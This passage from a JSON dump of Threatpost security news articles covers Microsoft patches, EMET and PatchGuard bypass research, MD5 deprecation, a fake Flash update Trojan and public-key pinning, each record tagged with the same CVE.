vulnerability is rated \u201ccritical\u201d for Microsoft Office 2007, Service Pack 2 and for 32 and 64 bit editions of Office 2010. It is rated \u201cimportant\u201d for Office 2003, Service Pack 3, Office XP, Service Pack 3 and Office for Mac 2011. \n\nAccording to Microsoft\u2019s Bulletin [Severity Rating System](<http://www.microsoft.com/technet/security/bulletin/rating.mspx>), \u201ccritical\u201d vulnerabilities are described as those whose exploitation could allow the propagation of an Internet worm without user interaction, while \u201cimportant\u201d holes are those in which exploitation could result in the compromise of the confidentiality, integrity or availability of users\u2019 data or processing resources. \n\nA second Office vulnerability is rated \u201cimportant\u201d and effects PowerPoint 2002 Service Pack 3 and PowerPoint 2003 Service Pack 3. \n\nThe third bulletin affects Microsoft\u2019s Forefront Unified Access Gateway 2010 Updates 1 and 2 and is rated important. \n\nMicrosoft will release its monthly patch update on Tuesday November 9, 2010. \n", "cvss3": {}, "published": "2010-11-04T21:58:02", "type": "threatpost", "title": "Microsoft To Patch Critical Office Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:44", "id": "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "href": "https://threatpost.com/microsoft-patch-critical-office-flaw-110410/74642/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:18", "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. [Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. \u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want it a battler we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. They buy them to watch dancing babies.\u201d\n", "cvss3": {}, "published": "2014-02-26T14:14:34", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-03T22:04:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be permanent fix, instead it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with Data Execution Prevention and Address Space Layout Randomization, two key memory protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s bypass bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding to modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to be detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. \u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said.). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). \u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or by let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, fires off a flag when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list top level domains, host names or files where IE will not block outdated controls. Admins can also disable the feature altogether. The feature will also be off by default in the Local Intranet Zone and Trusted Sites Zone allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. The update will be supported only on IE 8-11 on Windows 7 SP1, IE versions supported on Windows 8 and higher, and all Security Zones in the browser.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. \u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007, SP 3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security bypass features are also being patched in the .NET framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "description": "Microsoft confirmed this week that one of its recent acquisitions, the gaming firm Mojang, has not been hacked.\n\nNearly 2,000 credentials belonging to users of the [Mojang game](<https://mojang.com/games/>) Minecraft \u2013 email addresses and passwords in plain-text \u2013 surfaced on Pastebin earlier this week and speculation began to run rampant.\n\nGiven the Swedish video gaming service \u2013 which Microsoft purchased in September \u2013 boasts in excess of 50 million members, many feared the company had been hacked.\n\n[Heise Security](<http://www.heise.de/newsticker/meldung/1800-Minecraft-Accounts-kompromittiert-2520192.html>) reported the breach on Monday, and searched through the list and discovered users from Germany were on it and that the information was current. If a user hasn\u2019t set a security question, attackers could potentially log into one user\u2019s account to another.\n\nMicrosoft\u2019s response however suggests it\u2019s just business as usual for Mojang, who like other gaming firms, get hacked from time to time and are forced to reset a small group of users\u2019 passwords.\n\n\u201cWe can confirm that no Mojang.net service was compromised and that normal industry procedures for dealing with situations like this were put in place to reset passwords for the small number of affected accounts,\u201d a Microsoft spokesperson told Stuart Dredge with _The Guardian_ on Wednesday.\n\nWhile Microsoft didn\u2019t explain exactly how the service\u2019s users were compromised, Owen Hill, the company\u2019s Chief Word Officer suggested that a fraction of Mojang\u2019s users may have been phished.\n\n\u201cNo! We haven\u2019t been hacked. A bunch of bad people have tricked some of our users into disclosing their account information,\u201d Hill wrote in a blog entry titled [Let\u2019s Talk About Password Security](<https://mojang.com/2015/01/lets-talk-about-password-security/>) yesterday.\n\nHill claims the company has already emailed the affected users and reset their passwords. To help reinforce security going forward, Hill is encouraging users to reset their passwords, not to use the same password on multiple websites and to avoid giving away account details on sites that aren\u2019t its own.\n\nGamers are routinely targeted by hackers and phishers alike.\n\nEmail addresses, hashed passwords and other information were spilled from the video game developer [Blizzard Entertainment when it was hacked in 2012](<http://threatpost.com/blizzard-sued-over-data-breach-authenticator-sales-111212/77207>) while in 2013 another video game company, [Ubisoft](<http://threatpost.com/ubisoft-urges-password-changes-following-hack/101165>), urged users to create new passwords after hackers were able to exploit a vulnerability to get to one of the company\u2019s databases. Usernames, email addresses and encrypted passwords were leaked in that hack.\n\nLast year, a cache of usernames, email addresses and salted password hashes belonging to players of the popular game [League of Legends](<http://na.leagueoflegends.com/en/news/riot-games/announcements/important-security-update-and-password-reset>) was compromised. The service forced users to change their passwords and had to put two new features, email verification and two-factor authentication, into development to bolster security.\n", "cvss3": {}, "published": "2015-01-22T14:35:45", "type": "threatpost", "title": "Mojang Resets Users' Passwords, Microsoft Insists Not a Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-27T15:10:50", "id": "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "href": "https://threatpost.com/following-credential-leak-microsoft-confirms-mojang-not-hacked/110596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "[](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday \nguidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security \nDevelopment Lifecycle (SDL) to Agile, an umbrella term for a \ndevelopment model frequently used for Web-based applications released \nunder short deadlines, called \u201csprints.\u201dilding online applications and for those \nusing the Agile code-development process. [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A bypass of PatchGuard kernel protection in Windows 10 has been developed that brings rootkits for the latest version of the OS within reach of attackers.\n\nSince the introduction of PatchGuard and DeviceGuard, very few 64-bit Windows rootkits have been observed; Windows 10\u2019s security, in particular its mitigations against memory-based attacks, are well regarded. Researchers at CyberArk, however, found a way around PatchGuard through a relatively new feature in Intel processors called Processor Trace (Intel PT).\n\nThe bypass, which has been nicknamed [GhostHook](<https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/>), is a post-exploitation attack and requires an attacker already be present on a compromised machine and running code in the kernel. As a result, Microsoft said it will not patch the issue, but may address it in a future version of Windows, CyberArk said. ~~A request for comment from Microsoft was not returned in time for publication.~~\n\n\u201cThis technique requires that an attacker has already fully compromised the targeted system. We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,\u201d a Microsoft representative said in a statement provided to Threatpost.\n\nCyberArk concedes this may be a difficult fix for Microsoft, and said the quickest path to a fix may come from security vendors whose products hook in to PatchGuard. Intel PT, which was released months after PatchGuard, enables security vendors to monitor stacks of commands that are executed in the CPU in order to identify attacks before they reach the operating system.\n\n\u201cWe are able to execute code in the kernel and go unnoticed by any security feature Microsoft produces,\u201d said Kobi Ben Naim, senior director of cyber research. \u201cMany other security vendors rely on PatchGuard and on DeviceGuard in order to receive reliable information and analyze whether it\u2019s benign or an attack. This bypass enables us to go unnoticed versus the security vendors we checked (this includes antimalware, firewalls, host-based intrusion detection and more) that rely on those security layers to provide reliable information.\u201d\n\nNaim said that such an attack is within the realm of a nation-state attacker and that some well known targeted intrusions such as Flame and Shamoon make use of 64-bit malware to establish a foothold on machines and networks. Naim warned as well that if exploit code were to become public and criminal operations were able to execute ransomware through this technique, the results could be \u201ccatastrophic.\u201d\n\nNaim said Microsoft is making a mistake in not addressing this issue sooner.\n\n\u201cWe got an answer from Microsoft saying that because you are already an administrator on the machine, it\u2019s already compromised. But in this case, it\u2019s the wrong answer,\u201d Naim said. \u201cAll of those new security layers weren\u2019t designed to combat administrators or code that runs with administrator rights. This is a problematic answer [from Microsoft].\u201d\n\nCyberArk contends that the weakness is in Microsoft\u2019s implementation of Intel PT, specifically at the point where Intel PT talks to the OS.\n\n\u201cThe Intel feature is an API that the kernel code can ask to receive and read information from the CPU. The way that Microsoft implemented this API is the issue we found,\u201d Naim said. \u201cThis enabled us to not only read information but enter our code into a secure location in the kernel.\u201d\n\nAn attacker interacting at that layer can run code of their choosing and do so quietly without being detected by any number of security technology, CyberArk said.\n\n\u201cIt\u2019s very important to say that PatchGuard itself is a very strong mechanism, and the fact is we haven\u2019t seen any rootkits since it was introduced in Windows 10,\u201d Naim said.\n\nCyberArk said it will make enough of its attack public to demonstrate that it\u2019s feasible and enable security vendors to ready patches from their end.\n\nKaspersky Lab released a statement:\n\n> \u201cKaspersky Lab is aware of the hooking technique described by CyberArk researchers, that allows using Intel processor\u2019s feature to circumvent Windows\u2019 security. As conducting such an attack would require that a hacker is already running code in the kernel, this hooking technique doesn\u2019t significantly extend an attack surface.\u201d\n\nNaim said CyberArk has not seen this type of attack in the wild, but believes nation-states are using it.\n\n\u201cWe think attackers are already using it in country- or military-grade malware,\u201d Naim said, adding that by examining research on Flame and Shamoon, nation-states are close to executing against this type of vulnerability.\n\n\u201cWe think it\u2019s pretty critical,\u201d Naim said. \u201cThe real impact is if an attacker uses it, they can go uncovered for many months before someone will notice something is wrong. If we can take this capability and add it to ransomware, it would be pretty catastrophic. No player will be able to stop them once they are executing code behind PatchGuard. Today ransomware works in user mode because of PatchGuard. If they were able to execute this code behind PatchGuard, it will be a catastrophic effect.\u201d\n\n_This article was updated June 22 with a comment from Microsoft and Kaspersky Lab._\n", "cvss3": {}, "published": "2017-06-22T11:25:39", "type": "threatpost", "title": "GhostHook Attack Bypasses Windows 10 PatchGuard", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-22T19:10:38", "id": "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "href": "https://threatpost.com/ghosthook-attack-bypasses-windows-10-patchguard/126462/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). [NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. In 2008, practical collision attacks including one where an attacker could spoof a trusted root certificate authority were also demonstrated, leading CERT late in that year to release [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag them for weak cryptography. The problem is that is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. \u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. Jose said by highlighting the text, you\u2019re able to read it to the end and notice a condition that states the user\u2019s home back will be changed\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains were for the new start pages, as well as the domains hosting the malicious Flash update were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:59", "description": "[](<https://threatpost.com/hunt-conficker-121409/>)There are several ongoing investigations attempting to find the authors of the Conficker botnet, one of the fastest spreading worms in history, but those responsible for the worm have proven elusive. [Read the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1376771,00.html>). [TechTarget]\n", "cvss3": {}, "published": "2009-12-14T18:55:04", "type": "threatpost", "title": "On the Hunt for Conficker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:54:03", "id": "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "href": "https://threatpost.com/hunt-conficker-121409/73256/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:51", "description": "Microsoft is considering adding public-key pinning\u2013an important defense against man-in-the-middle attacks\u2013to Internet Explorer.\n\nThe feature is designed to help protect users against the types of MITM attacks that rely on forged certificates, which comprise a large portion of those attacks. Attackers use forged or stolen certificates to trick victims\u2019 browsers into trusting a malicious site that the attacker controls. Public-key pinning helps prevent those attacks by binding a set of public keys issued by a trusted certificate authority to a specific domain. With that defense in place, if the user visits the site and is presented with a key that\u2019s not part of the pinned set, the browser will reject the secure connection.\n\nPublic-key pinning as an extension to HTTP is laid out in an Internet-Draft submitted to the IETF by a group of Google security engineers in October. The [draft](<http://tools.ietf.org/html/draft-ietf-websec-key-pinning-21>) makes it clear that in order for the system to work, site operators must be up to the task.\n\n\u201cDeploying PKP safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a (set of) SPKI(s) that becomes invalid. With care, host operators can greatly reduce the risk of main-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk,\u201d the specification says.\n\nBut in order for the system to work, browsers must support it, as well. Google Chrome already ships with public-key pinning support, and Mozilla Firefox 32, which debuted in September, also includes the feature. Now, Microsoft has public-key pinning [under consideration](<https://status.modern.ie/publickeypinningextensionforhttp>) for inclusion in Internet Explorer, too.\n\nMITM attacks come in a variety of flavors, but one of the key components in many of them is the use of a forged certificate. In order to fool a user\u2019s browser into trusting a site that the attacker controls, the attacker can present a stolen or forged certificate for the site, This happens fairly regularly, and the technique has come up in some high-profile attacks in the last few years. In 2011, an attacker [compromised Dutch CA DigiNotar](<https://threatpost.com/what-you-need-know-about-diginotar-hack-090211>) and issued himself valid certificates for a number of high-value domains, including those belonging to Google, Yahoo and Mozilla.\n\nEarlier that same year, an attacker\u2013who 